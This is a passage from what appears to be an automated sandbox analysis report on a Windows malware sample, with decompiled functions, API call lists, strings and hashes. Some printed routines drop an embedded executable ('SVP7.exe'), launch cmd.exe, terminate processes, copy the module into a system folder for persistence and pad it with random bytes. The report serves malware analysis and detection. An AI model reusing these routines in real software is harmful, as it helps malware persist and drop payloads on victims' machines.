											if(_t70 == 0) {
												E10015696();
											} else {
												E100116F7();
											}
											 *(_t123 - 4) = 3;
											L1001580C();
											 *(_t123 - 4) = 2;
											L10015860();
											_push(1);
											_pop(0);
										} else {
											while(1) {
												 *0x10026ac4 = E100115C3( *0x10026994, _t118, 0x10026998);
												_t74 = E10011691( *0x10026994, _t118, 0x1002699c);
												_t128 = _t128 + 0x18;
												 *0x10026ac4 = _t74;
												__eflags = _t74;
												if(_t74 != 0) {
													goto L12;
												}
												_t118 = _t118 + 1;
												__eflags = _t118 - _t80;
												if(_t118 < _t80) {
													continue;
												} else {
													goto L18;
												}
												goto L25;
											}
											goto L12;
										}
									}
								} else {
									L12:
									_t67 = E10011747( *0x10026994);
									_push( *0x10026994);
									__eflags = _t67;
									if(_t67 == 0) {
										E10015696();
									} else {
										E100116F7();
									}
									goto L22;
								}
							}
							L25:
							 *(_t123 - 4) = 1;
							L1001580C();
							 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
							L1001580C();
							_t43 = _t123 - 4;
							 *_t43 =  *(_t123 - 4) | 0xffffffff;
							__eflags =  *_t43;
							L1001580C();
							_t54 = 0;
						} else {
							_push(_t123 - 0x10);
							L1001585A();
							 *(_t123 - 4) = 5;
							_push(_t123 - 0x14);
							_t77 = E100061FE();
							 *(_t123 - 4) = 4;
							if(_t77 != 0) {
								L1001580C();
								goto L7;
							} else {
								L1001580C();
								 *(_t123 - 4) = 3;
								L1001580C();
								 *(_t123 - 4) = 2;
								L10015860();
								 *(_t123 - 4) = 1;
								L1001580C();
								 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
								L1001580C();
								 *(_t123 - 4) =  *(_t123 - 4) | 0xffffffff;
								L1001580C();
								_t54 = 0;
							}
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0xc));
				return _t54;
			}

0x1000635a
0x1000635f
0x10006368
0x1000636f
0x10006374
0x10006376
0x10006551
0x10006551
0x00000000
0x1000638c
0x1000638f
0x10006394
0x10006399
0x1000639a
0x1000639e
0x100063a3
0x100063a7
0x100063ae
0x10006545
0x10006548
0x1000654c
0x00000000
0x100063b4
0x100063ba
0x100063bb
0x100063c3
0x100063c7
0x100063d0
0x10006444
0x10006447
0x1000644c
0x1000644e
0x1000645b
0x10006450
0x10006450
0x10006450
0x10006464
0x10006465
0x1000646b
0x1000646e
0x10006473
0x10006539
0x1000653c
0x10006540
0x00000000
0x10006479
0x10006488
0x1000648e
0x10006491
0x10006496
0x100064c7
0x100064cc
0x100064cf
0x100064d1
0x100064d6
0x00000000
0x100064d8
0x100064d8
0x100064de
0x100064e0
0x10006516
0x1000651c
0x10006522
0x10006528
0x1000652a
0x10006588
0x1000652c
0x1000652c
0x1000652c
0x1000658e
0x10006595
0x1000659d
0x100065a1
0x100065a6
0x100065a8
0x100064e2
0x100064e2
0x100064fb
0x10006500
0x10006505
0x10006508
0x1000650d
0x1000650f
0x00000000
0x00000000
0x10006511
0x10006512
0x10006514
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x10006514
0x00000000
0x100064e2
0x100064e0
0x10006498
0x10006498
0x1000649e
0x100064a4
0x100064aa
0x100064ac
0x10006533
0x100064b2
0x100064b2
0x100064b2
0x00000000
0x10006538
0x10006496
0x10006553
0x10006556
0x1000655a
0x1000655f
0x10006566
0x1000656b
0x1000656b
0x1000656b
0x10006572
0x10006577
0x100063d2
0x100063d8
0x100063d9
0x100063e1
0x100063e5
0x100063e6
0x100063ec
0x100063f5
0x1000643f
0x00000000
0x100063f7
0x100063f7
0x100063ff
0x10006403
0x1000640b
0x1000640f
0x10006417
0x1000641b
0x10006420
0x10006427
0x1000642c
0x10006433
0x10006438
0x10006438
0x100063f5
0x100063d0
0x100063ae
0x1000657f
0x10006587

APIs

__EH_prolog.LIBCMT ref: 1000635A
#356.MFC42(?,00000000,00000000), ref: 1000638F
#2770.MFC42(00000000,00000000,?,00000000,00000000), ref: 100063A7
#535.MFC42(?,00000000,00000000,?,00000000,00000000), ref: 100063BB

Part of subcall function 100060EF: __EH_prolog.LIBCMT ref: 100060F4
Part of subcall function 100060EF: #535.MFC42(?,00000000), ref: 10006106
Part of subcall function 100060EF: #539.MFC42(100243F4,?,00000000), ref: 10006118
Part of subcall function 100060EF: #5710.MFC42(?,00000001,100243F4,?,00000000), ref: 1000612A
Part of subcall function 100060EF: #800.MFC42(00000000,?,?,00000001,100243F4,?,00000000), ref: 10006147
Part of subcall function 100060EF: #800.MFC42(00000000,?,?,00000001,100243F4,?,00000000), ref: 10006152
Part of subcall function 100060EF: #539.MFC42(100243F8,00000000,?,?,00000001,100243F4,?,00000000), ref: 10006164
Part of subcall function 100060EF: #939.MFC42(?,100243F8,00000000,?,?,00000001,100243F4,?,00000000), ref: 10006174
Part of subcall function 100060EF: #800.MFC42(?,100243F8,00000000,?,?,00000001,100243F4,?,00000000), ref: 1000617F
Part of subcall function 100060EF: #539.MFC42(*.*,00000000,?,?,00000001,100243F4,?,00000000), ref: 1000618C
Part of subcall function 100060EF: #939.MFC42(?,*.*,00000000,?,?,00000001,100243F4,?,00000000), ref: 1000619C
Part of subcall function 100060EF: #800.MFC42(?,*.*,00000000,?,?,00000001,100243F4,?,00000000), ref: 100061A7
Part of subcall function 100060EF: FindFirstFileA.KERNEL32(00000000,?,?,*.*,00000000,?,?,00000001,100243F4,?,00000000), ref: 100061BC
Part of subcall function 100060EF: FindClose.KERNEL32(00000000), ref: 100061DD
Part of subcall function 100060EF: #800.MFC42 ref: 100061EA

#535.MFC42(?,?,00000000,00000000,?,00000000,00000000), ref: 100063D9

Part of subcall function 100061FE: __EH_prolog.LIBCMT ref: 10006203
Part of subcall function 100061FE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00000000,00000000,00000000), ref: 10006218
Part of subcall function 100061FE: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60 ref: 10006226
Part of subcall function 100061FE: ??A?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAGI@Z.MSVCP60(-00000001), ref: 10006231
Part of subcall function 100061FE: ?append@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IG@Z.MSVCP60(00000001,0000005C), ref: 10006245
Part of subcall function 100061FE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 10006262
Part of subcall function 100061FE: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60 ref: 10006271
Part of subcall function 100061FE: ??A?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAGI@Z.MSVCP60(00000000), ref: 1000627F
Part of subcall function 100061FE: ??A?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAGI@Z.MSVCP60(00000000), ref: 1000628E
Part of subcall function 100061FE: ?append@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IG@Z.MSVCP60(00000001,0000005C,?), ref: 100062AC
Part of subcall function 100061FE: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60 ref: 100062B6
Part of subcall function 100061FE: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 100062D8
Part of subcall function 100061FE: lstrlenW.KERNEL32(00000000), ref: 100062E5
Part of subcall function 100061FE: CreateDirectoryA.KERNEL32(00000000,00000000), ref: 10006308
Part of subcall function 100061FE: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 10006322

#800.MFC42(?,?,00000000,00000000,?,00000000,00000000), ref: 100063F7
#800.MFC42(?,?,00000000,00000000,?,00000000,00000000), ref: 10006403
#668.MFC42(?,?,00000000,00000000,?,00000000,00000000), ref: 1000640F
#800.MFC42(?,?,00000000,00000000,?,00000000,00000000), ref: 1000641B
#800.MFC42(?,?,00000000,00000000,?,00000000,00000000), ref: 10006427
#800.MFC42(?,?,00000000,00000000,?,00000000,00000000), ref: 10006433
#800.MFC42(?,?,00000000,00000000,?,00000000,00000000), ref: 1000643F
#800.MFC42(?,00000000,00000000,?,00000000,00000000), ref: 10006540
#668.MFC42(00000000,00000000,?,00000000,00000000), ref: 1000654C
#800.MFC42(?,00000000,00000000), ref: 1000655A
#800.MFC42(?,00000000,00000000), ref: 10006566
#800.MFC42(?,00000000,00000000), ref: 10006572
#800.MFC42(00000000), ref: 10006595
#668.MFC42(00000000), ref: 100065A1

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: #800$V?$allocator@$G@2@@std@@G@std@@U?$char_traits@$#535#539#668?length@?$basic_string@A?$basic_string@H_prolog$#939??0?$basic_string@?append@?$basic_string@FindG@1@@V12@$#2770#356#5710??1?$basic_string@?c_str@?$basic_string@CloseCreateDirectoryFileFirstlstrlen
String ID:
API String ID: 2718685974-0
Opcode ID: a749e9bedf5ede2226ce3fbe8638897c31cc13952e4a840a3b8faf644fd0bcbe
Instruction ID: a9e194f6c63c80ff133ae926646b5198fa2afeb8aab33663cb4cbb5c29ab38e8
Opcode Fuzzy Hash: a749e9bedf5ede2226ce3fbe8638897c31cc13952e4a840a3b8faf644fd0bcbe
Instruction Fuzzy Hash: 95510238401255EAFB05DF60DD95AEDBBB9EF19380F24401DF805AA1D6EF31EB88C661

Uniqueness

Uniqueness Score: -1.00%

Function 1000490A, Relevance: 28.6, APIs: 19, Instructions: 94
processCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E1000490A() {
				int _t35;
				void* _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;
				void* _t68;

				E100158AC(E1001A1D6, _t68);
				_push(_t65);
				 *(_t68 - 4) = 0;
				_t62 = CreateToolhelp32Snapshot(2, 0);
				 *(_t68 - 0x138) = 0x128;
				if(Process32First(_t62, _t68 - 0x138) != 0) {
					L1001581E();
					_t35 = Process32Next(_t62, _t68 - 0x138);
					_t66 = _t65 | 0xffffffff;
					while(_t35 != 0) {
						_push(_t68 - 0x114);
						L10015818();
						 *(_t68 - 4) = 1;
						L1001581E();
						if(E10008660(_t68 - 0x10, E1000865D(_t68 + 8)) == 0) {
							_t64 = OpenProcess(1, 0,  *(_t68 - 0x130));
							TerminateProcess(_t64, 0);
							CloseHandle(_t64);
							_push(_t66);
							L10015812();
							_push(_t66);
							L10015812();
							 *(_t68 - 4) = 0;
							L1001580C();
							 *(_t68 - 4) = _t66;
							L1001580C();
							_push(1);
							_pop(0);
						} else {
							_push(_t66);
							L10015812();
							 *(_t68 - 4) = 0;
							L1001580C();
							_t35 = Process32Next(_t62, _t68 - 0x138);
							continue;
						}
						goto L9;
					}
					_push(_t66);
					L10015812();
					 *(_t68 - 4) = _t66;
					goto L8;
				} else {
					 *(_t68 - 4) =  *(_t68 - 4) | 0xffffffff;
					L8:
					L1001580C();
				}
				L9:
				 *[fs:0x0] =  *((intOrPtr*)(_t68 - 0xc));
				return 0;
			}

0x1000490f
0x1000491b
0x10004922
0x1000492a
0x10004934
0x10004945
0x10004953
0x10004960
0x10004965
0x10004968
0x10004979
0x1000497a
0x10004982
0x10004986
0x1000499e
0x100049d2
0x100049d6
0x100049dd
0x100049e3
0x100049e7
0x100049ec
0x100049f0
0x100049f8
0x100049fb
0x10004a03
0x10004a06
0x10004a0b
0x10004a0d
0x100049a0
0x100049a0
0x100049a4
0x100049ac
0x100049af
0x100049bc
0x00000000
0x100049bc
0x00000000
0x1000499e
0x10004a10
0x10004a14
0x10004a19
0x00000000
0x10004947
0x10004947
0x10004a1c
0x10004a1f
0x10004a24
0x10004a26
0x10004a2c
0x10004a34

APIs

__EH_prolog.LIBCMT ref: 1000490F
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10004925
Process32First.KERNEL32(00000000,?), ref: 1000493E
#4202.MFC42(00000000,?,00000002,00000000,?,00000000,75D6F420), ref: 10004953
Process32Next.KERNEL32 ref: 10004960
#537.MFC42(?,00000000,00000128,00000000,?,00000002,00000000,?,00000000,75D6F420), ref: 1000497A
#4202.MFC42(?,00000000,00000128,00000000,?,00000002,00000000,?,00000000,75D6F420), ref: 10004986
#5572.MFC42(00000000,00000000,?,00000000,00000128,00000000,?,00000002,00000000,?,00000000,75D6F420), ref: 100049A4
#800.MFC42(00000000,00000000,?,00000000,00000128,00000000,?,00000002,00000000,?,00000000,75D6F420), ref: 100049AF
Process32Next.KERNEL32 ref: 100049BC
OpenProcess.KERNEL32(00000001,00000000,?,00000000,?,00000000,00000128,00000000,?,00000002,00000000,?,00000000,75D6F420), ref: 100049CC
TerminateProcess.KERNEL32(00000000,00000000), ref: 100049D6
CloseHandle.KERNEL32(00000000), ref: 100049DD
#5572.MFC42(00000000), ref: 100049E7
#5572.MFC42(00000000,00000000), ref: 100049F0
#800.MFC42(00000000,00000000), ref: 100049FB
#800.MFC42(00000000,00000000), ref: 10004A06
#800.MFC42(00000000,00000000,00000128,00000000,?,00000002,00000000,?,00000000,75D6F420), ref: 10004A1F

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: #800$#5572Process32$#4202NextProcess$#537CloseCreateFirstH_prologHandleOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 2547688666-0
Opcode ID: d87313572ee62838052ac96d7688ea870bca2350d6ec7a693578c25c96d350cb
Instruction ID: 116dfa7aadaacca7d08e7174c24914d3774f74191c6dea53ed83368edaa69c55
Opcode Fuzzy Hash: d87313572ee62838052ac96d7688ea870bca2350d6ec7a693578c25c96d350cb
Instruction Fuzzy Hash: 03319475401218EEEB00EFA0DC829EEB778FF45381F144469F816AA0C1DF35AB89DB60

Uniqueness

Uniqueness Score: -1.00%

Function 1000D502, Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 144libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ADVAPI32.dll,00000001,000F01FF,00000000,?,10015A2A,1001B498,000000FF,?,10003278,80000002,?,Description,00000001,?,00000000), ref: 1000D52F
GetProcAddress.KERNEL32(00000000,RegCreateKeyExA), ref: 1000D546
GetProcAddress.KERNEL32(00000000,RegSetValueExA), ref: 1000D551
GetProcAddress.KERNEL32(00000000,RegDeleteKeyA), ref: 1000D55C
GetProcAddress.KERNEL32(00000000,RegDeleteValueA), ref: 1000D567
GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 1000D572
GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 1000D57D
FreeLibrary.KERNEL32(00000000,?,10003278,80000002,?,Description,00000001,?), ref: 1000D671

Strings

ADVAPI32.dll, xrefs: 1000D52A
RegSetValueExA, xrefs: 1000D54B
RegDeleteKeyA, xrefs: 1000D556
RegCreateKeyExA, xrefs: 1000D53A
RegOpenKeyExA, xrefs: 1000D56C
RegDeleteValueA, xrefs: 1000D561
RegCloseKey, xrefs: 1000D577

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: AddressProc$Library$FreeLoad
String ID: ADVAPI32.dll$RegCloseKey$RegCreateKeyExA$RegDeleteKeyA$RegDeleteValueA$RegOpenKeyExA$RegSetValueExA
API String ID: 2449869053-3188892968
Opcode ID: 5a6eb46eb862b6c3f8adcebf82aef03c8f141187e3a8e0bf1e53564c59b37267
Instruction ID: 7bd5380c1d7209d2e7036881a142ae5b6984c826e5d31ced9866207cfd76fef9
Opcode Fuzzy Hash: 5a6eb46eb862b6c3f8adcebf82aef03c8f141187e3a8e0bf1e53564c59b37267
Instruction Fuzzy Hash: 83410571D0021DBFEB01EF94DC84EEEBBB9EB08690F404126FA19A2164DB329D519B64

Uniqueness

Uniqueness Score: -1.00%

Function 10005131, Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 101
filestringsleepCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E10005131(long _a4, intOrPtr _a8) {
				char _v264;
				char _v520;
				void _v1044;
				void* __ebp;
				void* _t39;
				void* _t41;
				void* _t43;
				void* _t52;
				void* _t55;
				intOrPtr _t56;

				_t52 = _a4;
				memcpy( &_v1044, _t52, 0x20c);
				_t56 = _t55 + 0xc;
				 *0x100273bc(0,  &_v520, 0x2e, 0);
				PathAddBackslashA( &_v520);
				strcat( &_v520, "SVP7.exe");
				_t43 = CreateFileA( &_v520, 0x40000000, 1, 0, 2, 0, 0);
				if(_t43 == 0xffffffff || WriteFile(_t43, _t52 + 0x20c, _a8 + 0xfffffdf4,  &_a4, 0) == 0) {
					return 0;
				} else {
					CloseHandle(_t43);
					 *0x100273bc(0,  &_v264, 0x2e, 0);
					PathAddBackslashA( &_v264);
					strcat( &_v264, "uac.exe");
					if(PathFileExistsA( &_v264) != 0) {
						_t41 = E10004E22( &_v264, 5);
						_pop(_t49);
						if(_t41 != 0) {
							Sleep(0x3e8);
							_a8 = _t56;
							_push("cmd.exe");
							L10015818();
							E1000490A();
						}
					}
					_t39 = 1;
					return _t39;
				}
			}

0x1000513d
0x1000514d
0x10005153
0x10005163
0x10005170
0x10005182
0x100051a2
0x100051a7
0x00000000
0x100051d0
0x100051d1
0x100051e2
0x100051ef
0x10005201
0x10005217
0x10005222
0x1000522a
0x1000522b
0x10005232
0x1000523b
0x1000523e
0x10005243
0x10005248
0x1000524d
0x1000522b
0x10005250
0x00000000
0x10005250

APIs

memcpy.MSVCRT ref: 1000514D
SHGetSpecialFolderPathA.SHELL32(00000000,?,0000002E,00000000), ref: 10005163
PathAddBackslashA.SHLWAPI(?), ref: 10005170
strcat.MSVCRT(?,SVP7.exe), ref: 10005182
CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 1000519C
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 100051BF
CloseHandle.KERNEL32(00000000), ref: 100051D1
SHGetSpecialFolderPathA.SHELL32(00000000,?,0000002E,00000000), ref: 100051E2
PathAddBackslashA.SHLWAPI(?), ref: 100051EF
strcat.MSVCRT(?,uac.exe), ref: 10005201
PathFileExistsA.SHLWAPI(?), ref: 1000520F
Sleep.KERNEL32(000003E8), ref: 10005232
#537.MFC42(cmd.exe), ref: 10005243

Strings

uac.exe, xrefs: 100051FB
SVP7.exe, xrefs: 1000517C
cmd.exe, xrefs: 1000523E

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: Path$File$BackslashFolderSpecialstrcat$#537CloseCreateExistsHandleSleepWritememcpy
String ID: SVP7.exe$cmd.exe$uac.exe
API String ID: 3628004154-3729313580
Opcode ID: b1f916e3a8f8b25d27b45e3da85927a4882c76681f236b9da3807290fe57353b
Instruction ID: d027aa597d02e2187d125a27f60523f0bb3feb7df28e39b26e43382b49584565
Opcode Fuzzy Hash: b1f916e3a8f8b25d27b45e3da85927a4882c76681f236b9da3807290fe57353b
Instruction Fuzzy Hash: 5B3184B6500229BBEB20DBA4DC8EFDB3B6CEF05755F104455FB19D6081EBB09A858B60

Uniqueness

Uniqueness Score: -1.00%

Function 1000478D, Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 91
sleepfileCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E1000478D(void* _a4) {
				char _v84;
				char _v344;
				char _v604;
				char _v864;
				char _v1124;
				long _t25;

				memcpy(0x10026b30, _a4, 0xcc);
				memset( &_v864, 0, 0x104);
				GetModuleFileNameA(0,  &_v864, 0x104);
				_t25 =  *0x100273bc(0,  &_v344, 7, 0);
				if(_t25 != 0) {
					wsprintfA( &_v84, "%s.exe", 0x10026b30);
					wsprintfA( &_v1124, "%s\\%s",  &_v344,  &_v84);
					_t25 = GetFileAttributesA( &_v1124);
					if(_t25 == 0xffffffff) {
						wsprintfA( &_v604, "%s\\%s",  &_v344,  &_v84);
						Sleep(0x64);
						CopyFileA( &_v864,  &_v604, 0);
						MoveFileExA( &_v864, 0, 4);
						CreateDirectoryA( &_v344, 0);
						E10004698( &_v604);
						return SetFileAttributesA( &_v604,  *0x10026bf8 & 0x0000ffff);
					}
				}
				return _t25;
			}

0x100047a7
0x100047bd
0x100047cf
0x100047e0
0x100047e8
0x100047f8
0x10004815
0x10004825
0x1000482e
0x10004847
0x10004852
0x10004867
0x10004877
0x10004885
0x10004892
0x00000000
0x100048a7
0x1000482e
0x100048b1

APIs

memcpy.MSVCRT ref: 100047A7
memset.MSVCRT ref: 100047BD
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 100047CF
SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 100047E0
wsprintfA.USER32 ref: 100047F8
wsprintfA.USER32 ref: 10004815
GetFileAttributesA.KERNEL32(?), ref: 10004825
wsprintfA.USER32 ref: 10004847
Sleep.KERNEL32(00000064), ref: 10004852
CopyFileA.KERNEL32(?,?,00000000), ref: 10004867
MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 10004877
CreateDirectoryA.KERNEL32(?,00000000), ref: 10004885

Part of subcall function 10004698: LoadLibraryA.KERNEL32(KERNEL32.dll), ref: 100046A9
Part of subcall function 10004698: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 100046D9
Part of subcall function 10004698: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 100046F2
Part of subcall function 10004698: GetFileSize.KERNEL32(00000000,00000000), ref: 100046FA
Part of subcall function 10004698: rand.MSVCRT ref: 1000473B
Part of subcall function 10004698: WriteFile.KERNEL32(?,?,00000400,?,00000000), ref: 10004771
Part of subcall function 10004698: CloseHandle.KERNEL32(?), ref: 10004782

SetFileAttributesA.KERNEL32(?,00000000), ref: 100048A7

Strings

%s\%s, xrefs: 1000480F
%s.exe, xrefs: 100047F2
%s\%s, xrefs: 10004841

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: File$wsprintf$AttributesCreate$CloseCopyDirectoryFolderHandleLibraryLoadModuleMoveNamePathPointerSizeSleepSpecialWritememcpymemsetrand
String ID: %s.exe$%s\%s$%s\%s
API String ID: 717291166-3294238481
Opcode ID: 257b7f83027b1a45e194575a5c9a7dfd05ccdcacfd790f4c99fb7a33f42779f5
Instruction ID: 59083b1a0a7509439352909976695f14bb28f4f1381898d8d1a367854a3aed7e
Opcode Fuzzy Hash: 257b7f83027b1a45e194575a5c9a7dfd05ccdcacfd790f4c99fb7a33f42779f5
Instruction Fuzzy Hash: 7E3100B280012DABEB11DBE0DC8CEEB777CFB45359F1445A6F609E2050D7749A498B64

Uniqueness

Uniqueness Score: -1.00%

Function 0040E932, Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 77
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0040E932() {
				void* __ebx;
				void* __esi;
				struct HINSTANCE__* _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t18;
				void* _t20;
				intOrPtr _t23;
				_Unknown_base(*)()* _t24;

				_t23 =  *0x4524e4; // 0x0
				if(_t23 == 0) {
					_push(_t20);
					 *0x4524e8 = E0040E8DA(0, _t20, __eflags);
					_t18 = GetModuleHandleA("USER32");
					__eflags = _t18;
					if(_t18 == 0) {
						L12:
						 *0x4524c8 = 0;
						 *0x4524cc = 0;
						 *0x4524d0 = 0;
						 *0x4524d4 = 0;
						 *0x4524d8 = 0;
						 *0x4524dc = 0;
						 *0x4524e0 = 0;
						_t5 = 0;
					} else {
						_t6 = GetProcAddress(_t18, "GetSystemMetrics");
						__eflags = _t6;
						 *0x4524c8 = _t6;
						if(_t6 == 0) {
							goto L12;
						} else {
							_t7 = GetProcAddress(_t18, "MonitorFromWindow");
							__eflags = _t7;
							 *0x4524cc = _t7;
							if(_t7 == 0) {
								goto L12;
							} else {
								_t8 = GetProcAddress(_t18, "MonitorFromRect");
								__eflags = _t8;
								 *0x4524d0 = _t8;
								if(_t8 == 0) {
									goto L12;
								} else {
									_t9 = GetProcAddress(_t18, "MonitorFromPoint");
									__eflags = _t9;
									 *0x4524d4 = _t9;
									if(_t9 == 0) {
										goto L12;
									} else {
										_t10 = GetProcAddress(_t18, "EnumDisplayMonitors");
										__eflags = _t10;
										 *0x4524dc = _t10;
										if(_t10 == 0) {
											goto L12;
										} else {
											_t11 = GetProcAddress(_t18, "GetMonitorInfoA");
											__eflags = _t11;
											 *0x4524d8 = _t11;
											if(_t11 == 0) {
												goto L12;
											} else {
												_t12 = GetProcAddress(_t18, "EnumDisplayDevicesA");
												__eflags = _t12;
												 *0x4524e0 = _t12;
												if(_t12 == 0) {
													goto L12;
												} else {
													_t5 = 1;
													__eflags = 1;
												}
											}
										}
									}
								}
							}
						}
					}
					 *0x4524e4 = 1;
					return _t5;
				} else {
					_t24 =  *0x4524d8; // 0x0
					return 0 | _t24 != 0x00000000;
				}
			}

APIs

GetModuleHandleA.KERNEL32(USER32,00000000,00000000,77435D80,0040EA7E,?,?,?,?,?,?,?,00410904,00000000,00000002,00000028), ref: 0040E95B
GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 0040E977
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0040E988
GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 0040E999
GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 0040E9AA
GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 0040E9BB
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0040E9CC
GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 0040E9DD

Strings

GetSystemMetrics, xrefs: 0040E971
EnumDisplayDevicesA, xrefs: 0040E9D7
USER32, xrefs: 0040E951
GetMonitorInfoA, xrefs: 0040E9C6
EnumDisplayMonitors, xrefs: 0040E9B5
MonitorFromPoint, xrefs: 0040E9A4
MonitorFromRect, xrefs: 0040E993
MonitorFromWindow, xrefs: 0040E982

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$HandleModule
String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
API String ID: 667068680-68207542
Opcode ID: 81ea67fbf865d9771fdd53aff3bbb2a608d098fc93b1f6b111ee602b6243a3ea
Instruction ID: 15476577cc6dc8d6a5a5a725306e3d868eb310d56356e3246a290c3a4fbb417b
Opcode Fuzzy Hash: 81ea67fbf865d9771fdd53aff3bbb2a608d098fc93b1f6b111ee602b6243a3ea
Instruction Fuzzy Hash: F22184B2D00311BAC7519F66BEC052ABAE4B34F742764193FE005E3292C7B8C0919F6D

Uniqueness

Uniqueness Score: -1.00%

Function 10008DC9, Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 120
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E10008DC9() {
				void* _v8;
				void* _v12;
				intOrPtr _v16;
				void* _v20;
				struct HINSTANCE__* _v24;
				_Unknown_base(*)()* _v28;
				void* _v32;
				char _v36;
				_Unknown_base(*)()* _v40;
				intOrPtr _v48;
				char _v56;
				struct HINSTANCE__* _t40;
				intOrPtr* _t46;
				intOrPtr* _t48;
				intOrPtr* _t50;
